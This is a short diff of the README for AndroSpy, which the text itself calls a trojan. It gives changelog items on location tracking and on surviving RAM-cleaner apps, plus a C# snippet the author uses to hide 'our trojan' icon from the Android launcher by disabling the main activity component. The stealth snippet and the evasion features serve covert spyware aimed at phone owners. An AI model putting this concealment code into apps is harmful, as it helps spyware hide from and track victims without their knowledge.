jiutiaoming/AndroSpy/README.md

 +Some visual changes.
 +Added dropped Pin URL into the Location Manager
 +Fixed terminate problem that caused by Ram Cleaner.
-Note: I use this code to hide our trojan icon from launcher but this doesn't work stable.
+Note: I used to this code to hide our trojan icon from launcher but this doesn't work stable.
 ```C#
 ComponentName componentName = new ComponentName(this, Java.Lang.Class.FromType(typeof(MainActivity)).Name);
 PackageManager.SetComponentEnabledSetting(componentName, ComponentEnabledState.Disabled, ComponentEnableOption.DontKillApp);